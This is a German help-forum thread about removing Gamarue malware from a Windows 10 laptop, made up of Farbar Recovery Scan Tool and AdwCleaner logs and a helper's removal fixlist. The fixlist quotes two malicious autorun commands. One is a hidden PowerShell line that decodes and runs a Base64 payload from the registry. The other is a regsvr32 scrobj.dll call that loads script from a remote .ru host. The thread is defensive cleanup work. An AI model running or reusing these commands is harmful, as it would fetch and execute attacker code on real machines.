Task: {C5D88ED0-F2CC-4454-8C31-965F8FC0C2A0} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe
Task: {C752F5F1-D27B-4954-AA2B-9C4E4500D357} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {CA3B4A87-99F8-4810-BF19-A18F1B3107DB} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {D35C04F6-8F88-4A03-8BA2-89159AC22A37} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Keine Datei <==== ACHTUNG
Task: {D56A0AC7-5318-4063-BBFA-A316BB8376D3} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-06-02] (Lenovo)
Task: {DFD6BAEA-857D-47A9-9549-63E9AC2DC5B7} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E02EBA99-651C-441A-A6DF-AEF563A9822D} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-06-02] ()
Task: {E0FFE99A-6A7C-442F-AB93-8EB9D8109C61} - System32\Tasks\Lenovo\Lenovo Settings Power => Rundll32.exe "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.dll",PwrMgrBkGndMonitor
Task: {E199183F-6CCA-42E0-8834-0B9241326AB6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {F6305F54-EAFE-4AFF-9F0F-1B9D0630DE8D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {FA52DB1A-7F2B-4BF0-81D5-DC5856B6BFE6} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\WINDOWS\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"
Task: {FE295463-A538-4E94-B586-9A9AEF092B99} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_21_0_0_213_pepper.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
ShortcutWithArgument: C:\Users\ararat\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\6fa8d4dcdac59e60\Chromium.lnk -> C:\Program Files\SRWare Iron (64-Bit)\chrome.exe (SRWare) -> --profile-directory=Default
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2016-02-11 20:38 - 2015-12-22 12:38 - 03180176 _____ () C:\Windows\system32\nvwmi64.exe
2016-02-15 22:01 - 2016-02-15 22:01 - 00031256 _____ () C:\WINDOWS\System32\us008lm.dll
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-20 16:50 - 2017-04-28 08:03 - 00213880 _____ () C:\Program Files (x86)\ThinkPad\Utilities\GR\PWMRT64V.DLL
2016-02-13 16:12 - 2016-02-02 16:37 - 02570752 _____ () C:\Program Files\SRWare Iron (64-Bit)\libglesv2.dll
2016-02-13 16:12 - 2016-02-02 16:37 - 00087552 _____ () C:\Program Files\SRWare Iron (64-Bit)\libegl.dll
2016-04-21 18:33 - 2013-12-22 08:22 - 00047496 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll
2016-04-21 18:33 - 2013-12-22 08:22 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll
2016-02-25 21:38 - 2016-02-25 21:38 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ==========================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2016-02-23 23:08 - 2016-07-30 18:02 - 00003191 _____ C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 activate.adobe.com
127.0.0.1 adobe.activate.com
127.0.0.1 activate.adobe.de
127.0.0.1 adobeereg.com
127.0.0.1 hl2rcv.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 activate-sea.adobe.de
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 activate.wip.adobe.com
127.0.0.1 activate.wip1.adobe.com
127.0.0.1 activate.wip2.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 activate.wip4.adobe.com
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 practivate.adobe
127.0.0.1 practivate.adobe.de
127.0.0.1 practivate.adobe.com
Da befinden sich 48 zusätzliche Einträge.
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Netzwerk Server.lnk"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "NvBackend"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "SwitchBoard"
HKLM\...\StartupApproved\Run32: => "ADSKAppManager"
HKLM\...\StartupApproved\Run32: => "IMSS"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [{653565DE-9382-4D0D-85FF-4568B9133C1E}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [UDP Query User{628701B0-B712-431B-9393-9A95979EDCD3}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe
FirewallRules: [TCP Query User{F7353599-717C-48F1-A7C4-29EA353FB9EA}C:\program files\srware iron (64-bit)\chrome.exe] => (Block) C:\program files\srware iron (64-bit)\chrome.exe
FirewallRules: [{792A37F2-D689-4DD6-8D2C-FBA7331805F4}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [{B791C512-BFC4-4770-9ECA-470BCC2A7DEE}] => (Block) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [UDP Query User{8B73BCF1-A27F-46FA-8493-FCAEC1304E80}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [TCP Query User{89173555-CB79-4375-8B44-776AD246B48C}C:\program files\autodesk\3ds max 2015\3dsmax.exe] => (Allow) C:\program files\autodesk\3ds max 2015\3dsmax.exe
FirewallRules: [{62792125-6600-4F0D-9E98-36AFFE88A65C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{0A1FDF08-88CB-46A6-A831-2C99CBD8CB46}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{DF579F84-82D2-4D87-AE46-8C50FEEADB09}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{E5FE0167-99D3-4174-B1EC-B4885B8F4350}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [TCP Query User{2F4AFE87-B42B-45E3-B554-1995154ED7F8}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{DA37DC8E-E6FD-4F94-8205-AD8E720DF402}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [{AA8607DB-7DDC-461E-A485-928A060249F7}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe
FirewallRules: [{88856880-8A4A-42AB-9D2E-30C799D2B9F1}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\ArchiCAD.exe
FirewallRules: [{39C35EB4-AA50-466F-A4BF-3C59A7E3BA8C}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe
FirewallRules: [{7926FF23-E4D1-454F-B88A-87D18A9AB988}] => (Allow) C:\Program Files\GRAPHISOFT\ArchiCAD 18\CineRender\CineRender 64bit.exe
FirewallRules: [{E9100150-1A9E-4657-BC50-714390476085}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{9CEAA83C-8F23-4BDB-BAFF-C8C84FEE4D81}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{CC90D6FE-8983-4889-9794-A14326787265}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [TCP Query User{FB492D07-7354-45CC-ADD9-E6AE207F9190}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{CCD8C032-9093-4911-BCD8-02465C75B061}C:\users\ararat\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ararat\appdata\roaming\spotify\spotify.exe
FirewallRules: [{EA429A43-2FEC-4D6F-826C-06F17CCC0613}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe
FirewallRules: [{20E60939-1FF9-49B8-A516-9542A3F2C33E}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe
FirewallRules: [{28C60E63-767D-4518-A3D4-6123F4316D49}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe
FirewallRules: [{9BF832A9-551A-4DF6-99CA-5002606D4197}] => (Allow) C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64.exe
FirewallRules: [{2D2FEEFE-0D55-4D31-BC23-46F39EBD0F58}] => (Allow) C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe
FirewallRules: [{6353C606-2B4C-4737-BF11-4B5E18EBAF06}] => (Allow) C:\Program Files\Chaos Group\V-Ray\3dsmax 2015 for x64\vrlservice.exe
FirewallRules: [TCP Query User{E451C298-1596-4AD5-A4EE-B7F4F17C1071}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{5D6F2A66-AF06-4682-A369-62305BA12C39}C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe] => (Block) C:\program files\graphisoft\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [TCP Query User{1ACF387C-2C3D-49B0-B24B-F58F47F86A71}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe
FirewallRules: [UDP Query User{5CF615D2-8196-4AEF-9F97-12FED9AA7D13}C:\program files\graphisoft\archicad 18\archicad.exe] => (Block) C:\program files\graphisoft\archicad 18\archicad.exe
FirewallRules: [{1D081E8A-DD53-4FDB-B585-23585FFA1137}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{65AAA8A3-F502-43D1-8931-540CB11FCF00}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
==================== Wiederherstellungspunkte =========================
14-06-2017 20:31:05 Windows Update
20-06-2017 21:19:32 Windows Update
03-07-2017 02:01:02 Geplanter Prüfpunkt
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (07/02/2017 09:09:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000003bbef
ID des fehlerhaften Prozesses: 0x9f8
Startzeit der fehlerhaften Anwendung: 0x01d2f366b2d3f47c
Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 6bd68206-76e6-418c-bab1-aa186b69cf68
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (06/29/2017 10:07:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: WSCommCntr4.exe, Version: 4.0.3.0, Zeitstempel: 0x52e23951
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.15063.0, Zeitstempel: 0xb79b6ddb
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000003bbef
ID des fehlerhaften Prozesses: 0xa2c
Startzeit der fehlerhaften Anwendung: 0x01d2f1135d2f73eb
Pfad der fehlerhaften Anwendung: C:\Program Files\Common Files\Autodesk Shared\WSCommCntr4\Lib\WSCommCntr4.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: bd38a6ca-5ed4-42f0-be88-1ecd6890a6e2
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Error: (06/28/2017 07:04:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: MsMpEng.exe, Version: 4.11.15063.0, Zeitstempel: 0x418969b3
Name des fehlerhaften Moduls: offreg.dll_unloaded, Version: 10.0.15063.168, Zeitstempel: 0xfaed1333
Ausnahmecode: 0xc0000005
Fehleroffset: 0x0000000000001440
ID des fehlerhaften Prozesses: 0x1088
Startzeit der fehlerhaften Anwendung: 0x01d2e54a788d7120
Pfad der fehlerhaften Anwendung: C:\Program Files\Windows Defender\MsMpEng.exe
Pfad des fehlerhaften Moduls: offreg.dll
Berichtskennung: 0a8d723a-7e31-4589-8105-733ccd81828d
Vollständiger Name des fehlerhaften Pakets:
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:
Systemfehler:
=============
Error: (07/04/2017 09:33:45 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/04/2017 09:33:45 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/04/2017 09:44:03 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.
Error: (07/04/2017 09:44:02 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
Error: (07/04/2017 09:01:20 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/04/2017 09:01:20 AM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/03/2017 10:57:30 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/03/2017 10:57:30 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
und der APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.
Error: (07/03/2017 10:57:24 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Der Dienst "NetTcpActivator" ist vom Dienst "NetTcpPortSharing" abhängig, der aufgrund folgenden Fehlers nicht gestartet wurde:
Der angegebene Dienst kann nicht gestartet werden. Er ist deaktiviert oder nicht mit aktivierten Geräten verbunden.
Error: (07/03/2017 10:57:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet:
Die Anforderung wird nicht unterstützt.
CodeIntegrity:
===================================
Date: 2017-07-03 01:25:38.548
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-06-28 19:04:24.848
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-06-28 19:04:24.794
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-06-18 19:26:08.764
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-06-13 08:51:15.282
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz
Prozentuale Nutzung des RAM: 19%
Installierter physikalischer RAM: 16079.95 MB
Verfügbarer physikalischer RAM: 12948.66 MB
Summe virtueller Speicher: 32463.95 MB
Verfügbarer virtueller Speicher: 29381.89 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:236.7 GB) (Free:91.35 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 5346E13D)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=236.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=889 MB) - (Type=27)
==================== Ende von Addition.txt ============================
|
|
05.07.2017, 14:56
| #14 |
| /// TB-Senior | Windows 10 - Gamarue Schritt 1: Entfernen mit FRST Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter closeprocesses:
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [{C2956868-62F6-438A-A9BC-12CB233D69BF}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BPMJBABA').nhnPLmKgFtez)));
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.39slxu3bw.ru/deploy.xml scrobj.dll
emptytemp:
Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
Schritt 2: AdwareCleaner Downloade Dir bitte AdwCleaner auf deinen Desktop.
Schritt 3: MBAM Downloade Dir bitte Malwarebytes Anti-Malware
Schritt 4: neue FRST-Logs
__________________ Zum Schutz vor Trojanerinnen und Femaleware ist bei einem aktuellen Windows 10 die Windows-Defenderin ausreichend. |
|
05.07.2017, 20:35
| #15 | ||
| | Windows 10 - Gamarue Schritt 1: Zitat:
AdwCleaner Logfile: Code:
ATTFilter # AdwCleaner v6.047 - Bericht erstellt am 05/07/2017 um 21:24:36
# Aktualisiert am 19/05/2017 von Malwarebytes
# Datenbank : 2017-05-19.1 [Lokal]
# Betriebssystem : Windows 10 Pro (X64)
# Benutzername : ararat - ARARAT-NOTEBOOK
# Gestartet von : C:\Users\ararat\Desktop\AdwCleaner_6.047.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support
***** [ Dienste ] *****
[-] Dienst gelöscht: SSSvc
***** [ Ordner ] *****
[-] Ordner gelöscht: C:\Users\ararat\AppData\Local\PackageAware
***** [ Dateien ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
***** [ Registrierungsdatenbank ] *****
***** [ Browser ] *****
*************************
:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: TCP/IP Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht
:: Hosts-Datei wiederhergestellt
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [1233 Bytes] - [05/07/2017 21:24:36]
C:\AdwCleaner\AdwCleaner[S0].txt - [1356 Bytes] - [05/07/2017 21:24:15]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [1379 Bytes] ##########
Schritt 3: Zitat:
FRST Logfile: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 03-07-2017 01
durchgeführt von ararat (Administrator) auf ARARAT-NOTEBOOK (05-07-2017 21:31:29)
Gestartet von C:\Users\ararat\Desktop
Geladene Profile: ararat (Verfügbare Profile: ararat & DefaultAppPool)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files\SRWare Iron (64-Bit)\chrome.exe" -- "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(Lenovo.) C:\Windows\System32\LPlatSvc.exe
() C:\Windows\System32\nvwmi64.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
